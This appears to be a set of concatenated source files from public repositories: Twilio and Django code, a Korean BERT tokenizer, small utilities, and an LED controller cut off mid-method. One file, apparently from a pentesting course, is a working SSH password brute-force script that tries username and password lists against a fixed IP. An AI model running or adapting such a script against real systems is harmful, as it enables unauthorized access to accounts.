00d46f6208f8351c6481c11aeca380df258cd34e | 3c0526e87e9ea80ef2676058f3023e9111d0eab9 | /twilio/rest/notify/v1/service/notification.py | c9a3ffe4539915cad8672dba9f4c79913168e87c | [] | no_license | smgood/cryptobot | f24ef69b9b253b9e421bf5bbef3b750fcc1a7332 | 13448eb8dfc34fedaba4d10ce642c38fe80a3526 | refs/heads/master | 2020-07-21T15:36:55.353596 | 2019-09-07T03:37:56 | 2019-09-07T03:37:56 | 206,910,383 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,909 | py | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class NotificationList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, service_sid):
"""
Initialize the NotificationList
:param Version version: Version that contains the resource
:param service_sid: The service_sid
:returns: twilio.rest.notify.v1.service.notification.NotificationList
:rtype: twilio.rest.notify.v1.service.notification.NotificationList
"""
super(NotificationList, self).__init__(version)
# Path Solution
self._solution = {'service_sid': service_sid, }
self._uri = '/Services/{service_sid}/Notifications'.format(**self._solution)
def create(self, body=values.unset, priority=values.unset, ttl=values.unset,
title=values.unset, sound=values.unset, action=values.unset,
data=values.unset, apn=values.unset, gcm=values.unset,
sms=values.unset, facebook_messenger=values.unset, fcm=values.unset,
segment=values.unset, alexa=values.unset, to_binding=values.unset,
identity=values.unset, tag=values.unset):
"""
Create a new NotificationInstance
:param unicode body: Indicates the notification body text.
:param NotificationInstance.Priority priority: Two priorities defined: low and high.
:param unicode ttl: This parameter specifies how long the notification is valid.
:param unicode title: Indicates the notification title.
:param unicode sound: Indicates a sound to be played.
:param unicode action: Specifies the actions to be displayed for the notification.
:param dict data: This parameter specifies the custom key-value pairs of the notification’s payload.
:param dict apn: APNS specific payload that overrides corresponding attributes in a generic payload for Bindings with the apn BindingType.
:param dict gcm: GCM specific payload that overrides corresponding attributes in generic payload for Bindings with gcm BindingType.
:param dict sms: SMS specific payload that overrides corresponding attributes in generic payload for Bindings with sms BindingType.
:param dict facebook_messenger: Messenger specific payload that overrides corresponding attributes in generic payload for Bindings with facebook-messenger BindingType.
:param dict fcm: FCM specific payload that overrides corresponding attributes in generic payload for Bindings with fcm BindingType.
:param unicode segment: The segment
:param dict alexa: The alexa
:param unicode to_binding: The destination address in a JSON object.
:param unicode identity: Delivery will be attempted only to Bindings with an Identity in this list.
:param unicode tag: Delivery will be attempted only to Bindings that have all of the Tags in this list.
:returns: Newly created NotificationInstance
:rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
"""
data = values.of({
'Identity': serialize.map(identity, lambda e: e),
'Tag': serialize.map(tag, lambda e: e),
'Body': body,
'Priority': priority,
'Ttl': ttl,
'Title': title,
'Sound': sound,
'Action': action,
'Data': serialize.object(data),
'Apn': serialize.object(apn),
'Gcm': serialize.object(gcm),
'Sms': serialize.object(sms),
'FacebookMessenger': serialize.object(facebook_messenger),
'Fcm': serialize.object(fcm),
'Segment': serialize.map(segment, lambda e: e),
'Alexa': serialize.object(alexa),
'ToBinding': serialize.map(to_binding, lambda e: e),
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return NotificationInstance(self._version, payload, service_sid=self._solution['service_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Notify.V1.NotificationList>'
class NotificationPage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the NotificationPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param service_sid: The service_sid
:returns: twilio.rest.notify.v1.service.notification.NotificationPage
:rtype: twilio.rest.notify.v1.service.notification.NotificationPage
"""
super(NotificationPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of NotificationInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.notify.v1.service.notification.NotificationInstance
:rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
"""
return NotificationInstance(self._version, payload, service_sid=self._solution['service_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Notify.V1.NotificationPage>'
class NotificationInstance(InstanceResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
class Priority(object):
HIGH = "high"
LOW = "low"
def __init__(self, version, payload, service_sid):
"""
Initialize the NotificationInstance
:returns: twilio.rest.notify.v1.service.notification.NotificationInstance
:rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
"""
super(NotificationInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload['sid'],
'account_sid': payload['account_sid'],
'service_sid': payload['service_sid'],
'date_created': deserialize.iso8601_datetime(payload['date_created']),
'identities': payload['identities'],
'tags': payload['tags'],
'segments': payload['segments'],
'priority': payload['priority'],
'ttl': deserialize.integer(payload['ttl']),
'title': payload['title'],
'body': payload['body'],
'sound': payload['sound'],
'action': payload['action'],
'data': payload['data'],
'apn': payload['apn'],
'gcm': payload['gcm'],
'fcm': payload['fcm'],
'sms': payload['sms'],
'facebook_messenger': payload['facebook_messenger'],
'alexa': payload['alexa'],
}
# Context
self._context = None
self._solution = {'service_sid': service_sid, }
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def service_sid(self):
"""
:returns: The service_sid
:rtype: unicode
"""
return self._properties['service_sid']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def identities(self):
"""
:returns: List of Identities.
:rtype: unicode
"""
return self._properties['identities']
@property
def tags(self):
"""
:returns: List of Tags
:rtype: unicode
"""
return self._properties['tags']
@property
def segments(self):
"""
:returns: The segments
:rtype: unicode
"""
return self._properties['segments']
@property
def priority(self):
"""
:returns: Two priorities defined: low and high.
:rtype: NotificationInstance.Priority
"""
return self._properties['priority']
@property
def ttl(self):
"""
:returns: This parameter specifies how long the notification is valid.
:rtype: unicode
"""
return self._properties['ttl']
@property
def title(self):
"""
:returns: Indicates the notification title.
:rtype: unicode
"""
return self._properties['title']
@property
def body(self):
"""
:returns: Indicates the notification body text.
:rtype: unicode
"""
return self._properties['body']
@property
def sound(self):
"""
:returns: Indicates a sound to be played.
:rtype: unicode
"""
return self._properties['sound']
@property
def action(self):
"""
:returns: Specifies the actions to be displayed for the notification.
:rtype: unicode
"""
return self._properties['action']
@property
def data(self):
"""
:returns: This parameter specifies the custom key-value pairs of the notification’s payload.
:rtype: dict
"""
return self._properties['data']
@property
def apn(self):
"""
:returns: APNS specific payload that overrides corresponding attributes in a generic payload for Bindings with the apn BindingType.
:rtype: dict
"""
return self._properties['apn']
@property
def gcm(self):
"""
:returns: GCM specific payload that overrides corresponding attributes in generic payload for Bindings with gcm BindingType.
:rtype: dict
"""
return self._properties['gcm']
@property
def fcm(self):
"""
:returns: FCM specific payload that overrides corresponding attributes in generic payload for Bindings with fcm BindingType.
:rtype: dict
"""
return self._properties['fcm']
@property
def sms(self):
"""
:returns: SMS specific payload that overrides corresponding attributes in generic payload for Bindings with sms BindingType.
:rtype: dict
"""
return self._properties['sms']
@property
def facebook_messenger(self):
"""
:returns: Messenger specific payload that overrides corresponding attributes in generic payload for Bindings with facebook-messenger BindingType.
:rtype: dict
"""
return self._properties['facebook_messenger']
@property
def alexa(self):
"""
:returns: The alexa
:rtype: dict
"""
return self._properties['alexa']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Notify.V1.NotificationInstance>'
| [
"sean@smgoodrich.com"
] | sean@smgoodrich.com |
ddc2c55f50b776d16bca2f8b5f58e50fd6fa2312 | 8b0e0886f9cfc4af097541fd97f609af75392ae9 | /orders/migrations/0007_delete_regularpizza.py | 991549fbaab9f1b2a754432218aae85b1774d3ac | [] | no_license | opalmer3/PinocchiosPizza | 17f78a0173e85f0663180e76724fa4216270d06a | 3a17e014b781ecec9e9d4d35690c0cdfd1d7b5ca | refs/heads/master | 2021-09-23T21:48:31.887121 | 2020-07-05T07:14:29 | 2020-07-05T07:14:29 | 249,429,937 | 0 | 0 | null | 2021-09-22T18:47:18 | 2020-03-23T12:52:07 | Python | UTF-8 | Python | false | false | 288 | py | # Generated by Django 3.0.3 on 2020-03-07 15:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('orders', '0006_extras'),
]
operations = [
migrations.DeleteModel(
name='RegularPizza',
),
]
| [
"oliverpalmer@OliverdeMacBook-Air.local"
] | oliverpalmer@OliverdeMacBook-Air.local |
e25fa82b3403e32d8fe5366def0356fc32944028 | 95a928ef0d5c8c0c27acace0de0f5df4afeb067d | /iodogservice/iodogservice/urls.py | b683aec8646ad7986aceef618d62e02a99169f37 | [] | no_license | ShuhuangSo/iodogService | 6aaeee4d76c4b366e341634613fb8763a33e949e | acf10a508240125d17de997c767259df74cac4aa | refs/heads/master | 2020-03-22T20:07:28.076499 | 2018-10-01T17:03:31 | 2018-10-01T17:03:31 | 140,574,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,228 | py | """iodogservice URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
# 2. Add a URL to urlpatterns/: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework.documentation import include_docs_urls
from rest_framework_jwt.views import obtain_jwt_token
from django.views.static import serve
from django.conf import settings
from product.views import SupplierListViewSet, SupplierBulkOperation, CheckSupplierName, ProductViewSet, RegProductView
from product.views import SupplierProductViewSet, SetDefaultSupplierView, CheckVskuView, ComboPackViewSet, BaseProductViewSet
from product.views import ComboBulkOperation, ProductBulkOperation, RegProductBulkOperation, ProductBulkImport
from product.views import VskuBulkImport, ComboBulkImport, VcomboBulkImport, SupplierBulkImport, SupplierProductListViewSet
from product.views import SupplierProductBulkOperation, CheckSKU, ProductLabelPrint, Test
from setting.views import LogisticsAuthViewSet, ThirdWarehouseViewSet
from warehouse.views import WarehouseViewSet, AddLocalWarehouse, AddPosition, PositionViewSet, UpdatePosition, BulkUpdatePositionStatus
from warehouse.views import WarehouseStockViewSet
from purchase.views import CalcRefillPromote, RefillPromoteViewSet, RefillSettingViewSet
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
# 产品库模块
router.register(r'api/suppliers', SupplierListViewSet, base_name='suppliers')
router.register(r'api/products', ProductViewSet, base_name='products')
router.register(r'api/supplier-product', SupplierProductViewSet, base_name='supplier-product')
router.register(r'api/supplier-product-list', SupplierProductListViewSet, base_name='supplier-product-list')
router.register(r'api/combopacks', ComboPackViewSet, base_name='combopacks')
router.register(r'api/base-products', BaseProductViewSet, base_name='api/base-products')
# 仓库模块
router.register(r'api/warehouse-setting', WarehouseViewSet, base_name='api/warehouse-list')
router.register(r'api/position', PositionViewSet, base_name='api/position')
router.register(r'api/warehouse-stock', WarehouseStockViewSet, base_name='api/warehouse-stock')
# 系统设置模块
router.register(r'api/logistics-auth', LogisticsAuthViewSet, base_name='api/logistics-auth')
router.register(r'api/third-warehouse', ThirdWarehouseViewSet, base_name='api/third-warehouse')
# 补货管理模块
router.register(r'api/refill-promote', RefillPromoteViewSet, base_name='api/refill-promote')
router.register(r'api/refill-setting', RefillSettingViewSet, base_name='api/refill-setting')
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^docs/', include_docs_urls(title='跨境狗API文档')),
url(r'^', include(router.urls)),
url(r'^api/login/', obtain_jwt_token),
url(r'^upload/(?P<path>.*)$', serve, {"document_root": settings.MEDIA_ROOT}),
# -----------------产品模块------------------
# 供应商批量操作
url(r'^api/suppliers-bulk/', SupplierBulkOperation.as_view(), name='suppliers-bulk'),
# 检查供应商名称
url(r'^api/suppliers-check/', CheckSupplierName.as_view(), name='suppliers-check'),
# 新增注册产品/添加注册国家
url(r'^api/reg-product/', RegProductView.as_view(), name='reg-product'),
# 批量操作新增注册产品/添加注册国家
url(r'^api/reg-product-bulk/', RegProductBulkOperation.as_view(), name='reg-product-bulk'),
# 设置默认供应商
url(r'^api/set-default-supplier/', SetDefaultSupplierView.as_view(), name='set-default-supplier'),
# 检查虚拟sku是否存在
url(r'^api/vsku-check/', CheckVskuView.as_view(), name='vsku-check'),
# 检查sku是否存在
url(r'^api/sku-is-exist-check/', CheckSKU.as_view(), name='sku-is-exist-check'),
# 组合sku批量操作
url(r'^api/combopacks-bulk/', ComboBulkOperation.as_view(), name='combopacks-bulk'),
# 产品批量操作
url(r'^api/products-bulk/', ProductBulkOperation.as_view(), name='products-bulk'),
# 供应商关联产品批量操作
url(r'^api/supplier-products-bulk/', SupplierProductBulkOperation.as_view(), name='supplier-products-bulk'),
# 产品批量导入
url(r'^api/import-product/', ProductBulkImport.as_view(), name='import-product'),
# 产品虚拟sku批量导入
url(r'^api/import-vsku/', VskuBulkImport.as_view(), name='import-vsku'),
# 组合产品批量导入
url(r'^api/import-combo/', ComboBulkImport.as_view(), name='import-combo'),
# 虚拟组合sku批量导入
url(r'^api/import-vcombo/', VcomboBulkImport.as_view(), name='import-vcombo'),
# 供应商批量导入
url(r'^api/import-supplier/', SupplierBulkImport.as_view(), name='import-supplier'),
# 打印产品标签
url(r'^api/product-print/', ProductLabelPrint.as_view(), name='product-print'),
# test
url(r'^api/product-test/', Test.as_view(), name='product-test'),
# -----------------仓库模块------------------
# 新增本地仓
url(r'^api/warehouse-add-local/', AddLocalWarehouse.as_view(), name='warehouse-add-local'),
# 添加仓位
url(r'^api/position-add/', AddPosition.as_view(), name='position-add'),
# 修改仓位
url(r'^api/position-update/', UpdatePosition.as_view(), name='position-update'),
# 披露修改仓位状态
url(r'^api/position-bulk-update/', BulkUpdatePositionStatus.as_view(), name='position-bulk-update'),
# -----------------补货管理模块------------------
# 补货计算
url(r'^api/refill-calc/', CalcRefillPromote.as_view(), name='refill-calc'),
]
| [
"shuhuang.so@qq.com"
] | shuhuang.so@qq.com |
1dca65b0e31944c67b64eb4542abf988338475ba | 882026439fb24cacbd1b671ae43bd0da2ac734df | /tokenization_kobert.py | 34d3fa079c7717814a8dd0d6598c01ac5a33c59f | [
"Apache-2.0"
] | permissive | fightnyy/Stock_Prediction | 94fa5761a1860429d033ecc735d9fa89d75667b8 | f0dd42bd511e74876ede92c4d10aa6384d542613 | refs/heads/master | 2023-07-11T04:30:48.546817 | 2021-08-19T06:30:01 | 2021-08-19T06:30:01 | 338,271,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,022 | py | # coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team and Jangwon Park
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for KoBert model."""
import logging
import os
import sentencepiece as spm
import unicodedata
from shutil import copyfile
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "tokenizer_78b3253a26.model",
"vocab_txt": "vocab.txt"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/tokenizer_78b3253a26.model",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/tokenizer_78b3253a26.model",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/tokenizer_78b3253a26.model"
},
"vocab_txt": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/vocab.txt",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/vocab.txt",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/vocab.txt"
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"monologg/kobert": 512,
"monologg/kobert-lm": 512,
"monologg/distilkobert": 512
}
PRETRAINED_INIT_CONFIGURATION = {
"monologg/kobert": {"do_lower_case": False},
"monologg/kobert-lm": {"do_lower_case": False},
"monologg/distilkobert": {"do_lower_case": False}
}
SPIECE_UNDERLINE = u'▁'
class KoBertTokenizer(PreTrainedTokenizer):
"""
SentencePiece based tokenizer. Peculiarities:
- requires `SentencePiece <https://github.com/google/sentencepiece>`_
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
self,
vocab_file,
vocab_txt,
do_lower_case=False,
remove_space=True,
keep_accents=False,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
**kwargs):
super().__init__(
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
**kwargs
)
# Build vocab
self.token2idx = dict()
self.idx2token = []
with open(vocab_txt, 'r', encoding='utf-8') as f:
for idx, token in enumerate(f):
token = token.strip()
self.token2idx[token] = idx
self.idx2token.append(token)
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.do_lower_case = do_lower_case
self.remove_space = remove_space
self.keep_accents = keep_accents
self.vocab_file = vocab_file
self.vocab_txt = vocab_txt
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(vocab_file)
@property
def vocab_size(self):
return len(self.idx2token)
def get_vocab(self):
return dict(self.token2idx, **self.added_tokens_encoder)
def __getstate__(self):
state = self.__dict__.copy()
state["sp_model"] = None
return state
def __setstate__(self, d):
self.__dict__ = d
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(self.vocab_file)
def preprocess_text(self, inputs):
if self.remove_space:
outputs = " ".join(inputs.strip().split())
else:
outputs = inputs
outputs = outputs.replace("``", '"').replace("''", '"')
if not self.keep_accents:
outputs = unicodedata.normalize('NFKD', outputs)
outputs = "".join([c for c in outputs if not unicodedata.combining(c)])
if self.do_lower_case:
outputs = outputs.lower()
return outputs
def _tokenize(self, text, return_unicode=True, sample=False):
""" Tokenize a string. """
text = self.preprocess_text(text)
if not sample:
pieces = self.sp_model.EncodeAsPieces(text)
else:
pieces = self.sp_model.SampleEncodeAsPieces(text, 64, 0.1)
new_pieces = []
for piece in pieces:
if len(piece) > 1 and piece[-1] == str(",") and piece[-2].isdigit():
cur_pieces = self.sp_model.EncodeAsPieces(piece[:-1].replace(SPIECE_UNDERLINE, ""))
if piece[0] != SPIECE_UNDERLINE and cur_pieces[0][0] == SPIECE_UNDERLINE:
if len(cur_pieces[0]) == 1:
cur_pieces = cur_pieces[1:]
else:
cur_pieces[0] = cur_pieces[0][1:]
cur_pieces.append(piece[-1])
new_pieces.extend(cur_pieces)
else:
new_pieces.append(piece)
return new_pieces
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.token2idx.get(token, self.token2idx[self.unk_token])
def _convert_id_to_token(self, index, return_unicode=True):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.idx2token[index]
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (strings for sub-words) in a single string."""
out_string = "".join(tokens).replace(SPIECE_UNDERLINE, " ").strip()
return out_string
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks
by concatenating and adding special tokens.
A KoBERT sequence has the following format:
single sequence: [CLS] X [SEP]
pair of sequences: [CLS] A [SEP] B [SEP]
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.
Args:
token_ids_0: list of ids (must not contain special tokens)
token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids
for sequence pairs
already_has_special_tokens: (default False) Set to True if the token list is already formated with
special tokens for the model
Returns:
A list of integers in the range [0, 1]: 0 for a special token, 1 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formated with special tokens for the model."
)
return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
"""
Creates a mask from the two sequences passed to be used in a sequence-pair classification task.
A KoBERT sequence pair mask has the following format:
0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1
| first sequence | second sequence
if token_ids_1 is None, only returns the first portion of the mask (0's).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory):
""" Save the sentencepiece vocabulary (copy original file) and special tokens file
to a directory.
"""
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
# 1. Save sentencepiece model
out_vocab_model = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_file"])
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_model):
copyfile(self.vocab_file, out_vocab_model)
# 2. Save vocab.txt
index = 0
out_vocab_txt = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_txt"])
with open(out_vocab_txt, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.token2idx.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
"Saving vocabulary to {}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!".format(out_vocab_txt)
)
index = token_index
writer.write(token + "\n")
index += 1
return out_vocab_model, out_vocab_txt
| [
"fightnyy@naver.com"
] | fightnyy@naver.com |
dc52624b745e24996b18b3d581240cefcbe6d403 | 04934bc61ceab01ad24ab1672461a1b103884e91 | /ssh/sshconn_002.py | da12bca4af6f78377d324cb95c618bfe4ad0dab7 | [] | no_license | aiedonline/aulapentest | 05f31d0410493f02361fe778ab02d584aa84ef5e | 1dd28feb95941f49205af836c9013283b4cb6b99 | refs/heads/main | 2023-08-18T10:22:19.596876 | 2021-09-26T20:14:50 | 2021-09-26T20:14:50 | 402,219,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | #!/usr/bin/python
import sys;
from netmiko import Netmiko
ip = "11.11.11.171";
print("\033[1;33m[*] - SSH Bruteforce Attack", " \033[0;0m");
print("\033[1;33m[*] - SSH target", ip, " \033[0;0m");
with open("user.txt") as users:
users = users.readlines();
for user in users:
passwords_testados = [];
with open("password.txt") as passwords:
passwords = passwords.readlines();
passwords.insert(0, user); # a senha mais usada e o proprio usuario
for password in passwords:
try:
if password in passwords_testados:
continue;
sshconn = Netmiko(ip, username= user.strip(), password=password.strip(), device_type="linux");
sshconn.disconnect();
print("\033[1;32m[+] SUCES PARA", user.strip(), password.strip(), " \033[0;0m");
except KeyboardInterrupt:
print( 'Usuarqio quer sair.');
sys.exit(0);
except:
print("\033[1;31m[-] FALHA PARA", user.strip(), password.strip(), " \033[0;0m");
finally:
passwords_testados.insert(0, password);
| [
"yellow@battosai.yellow.dojo"
] | yellow@battosai.yellow.dojo |
8154ce9d82bc5533326b0e641b518b607fc704f8 | b1a876258834300bcdd46aa162c0910493dc808d | /sort/quick_sort.py | 5d06aa20a90a770ce0c84ab449bb92a8ad312c08 | [] | no_license | strengthening/python_test | 6dda572909dfb90e48ed53a8100a7d3583d3488c | 8fe74f6fc321c3342982e80b67baaafb423180c6 | refs/heads/master | 2020-12-30T16:02:26.530573 | 2017-05-19T01:08:10 | 2017-05-19T01:08:10 | 90,954,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
def quick_sort(slist):
qsort(slist, 0 , len(slist)-1)
def qsort(slist , low , high):
if low < high:
piovet = partitional(slist , low ,high)
qsort(slist,low,piovet-1)
qsort(slist,piovet + 1 , high)
def partitional(slist, low , high):
piovetkey = slist[low]
while low < high:
while low < high and slist[high] > piovetkey:
high -= 1
slist[low], slist[high] = slist[high], slist[low]
while low < high and slist[low] < piovetkey :
low += 1
slist[low], slist[high] = slist[high], slist[low]
return low
if __name__ == '__main__':
slist = [3,2,1,5,23,6,9,10]
quick_sort(slist)
print slist | [
"ducg@foxmail.com"
] | ducg@foxmail.com |
02705c64ac6216a1f64958cfc907cf8487c2fd3b | c68ae881b697289a5b3c384a116cf377844e2df2 | /core/image.py | 292e3207099f842be939dfffdbb3a82d04886da3 | [] | no_license | GPCracker/WoTAtlasConverter | f0ff0e897c1b1f84641ec076b1f75e8de42ad2ec | c5070bb27732e2df1292ce304a3cb910dd310772 | refs/heads/master | 2021-01-19T22:08:40.786898 | 2016-12-21T14:12:57 | 2016-12-21T14:12:57 | 76,104,269 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | import PIL.Image
from .utils import filesystem
class Image(object):
__slots__ = ('_data', )
def __init__(self, data):
super(Image, self).__init__()
self._data = data
return
@property
def data(self):
return self._data
@property
def width(self):
return self._data.size[0]
@property
def height(self):
return self._data.size[1]
@property
def side(self):
return max(self._data.size)
@property
def area(self):
return self._data.size[0] * self._data.size[1]
@classmethod
def create_new(sclass, width, height):
return sclass(PIL.Image.new('RGBA', (width, height)))
@classmethod
def load_file(sclass, image_path):
with open(image_path, 'rb') as data_io:
data = PIL.Image.open(data_io).convert('RGBA')
return sclass(data)
def save_file(self, image_path):
filesystem.create_dirs(image_path)
with open(image_path, 'wb') as data_io:
self._data.save(data_io, format='PNG')
return
def crop_subtexture(self, box=None):
return self.__class__(self._data.crop(box).copy())
def paste_subtexture(self, image, box=None):
self._data.paste(image.data, box)
return
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return self._data == other.data
def __repr__(self):
return '{}(data={!r})'.format(self.__class__.__name__, self._data)
| [
"GPCracker@mail.ru"
] | GPCracker@mail.ru |
f7e7ee93eb9d8733258576dbc3e915461981f04d | c30c63f88bd468712dd4e7d58940cf387d5e0ffa | /flaskr/routes.py | 68d8e9ad2961993ff2529d16e23a594838f80658 | [] | no_license | gosantos/sacadev | dd407abc84b1c9a97bf3add54ffbf3449cfbfc70 | e96ada4675a7b633adfe02799205ed06fa5b5752 | refs/heads/master | 2023-01-05T17:56:39.289533 | 2020-11-04T19:57:54 | 2020-11-04T19:57:54 | 310,092,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
return {
"value": "hello"
}
| [
"cjcbusatto@gmail.com"
] | cjcbusatto@gmail.com |
8d1bf89abd0cfa7aac2b61e3d556c1e476452989 | d543a55ab43a984b335edbbd563b6b047b471532 | /roof.py | 10807983d78394f6d9d83cda2fc61b34e46c5263 | [] | no_license | jimmo/led-roof | 2fa7b64565cbf2901883c5ffe33660d43131b3df | 84912e23fac566eb7f98c94f4cdfd13131c15a78 | refs/heads/main | 2023-09-05T06:30:55.695258 | 2021-11-17T13:07:05 | 2021-11-17T13:07:05 | 425,812,630 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import math
import random
import socket
import struct
import sys
import time
import asyncio
import rainbow
_CMD_ALL_COLOR = 0
_CMD_STRIP_COLOR = 1
_CMD_STRIP_PIXEL = 2
_CMD_ALL_PIXEL = 2
_CONTROLLER_DELAY = 0.015
class Controller:
def __init__(self, ip, port):
self._ip = ip
self._port = port
self._last = 0
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._q = []
async def _wait(self):
while True:
dt = time.monotonic() - self._last
if dt > _CONTROLLER_DELAY:
break
await asyncio.sleep(_CONTROLLER_DELAY - dt)
self._last = time.monotonic()
async def _send(self, buf):
async def task():
await self._wait()
# print(self._ip, time.monotonic()-ttt)
self._sock.sendto(buf, (self._ip, self._port))
self._q.append(asyncio.create_task(task()))
async def flush(self):
await asyncio.gather(*self._q)
self._q = []
async def color(self, r, g, b, w=0):
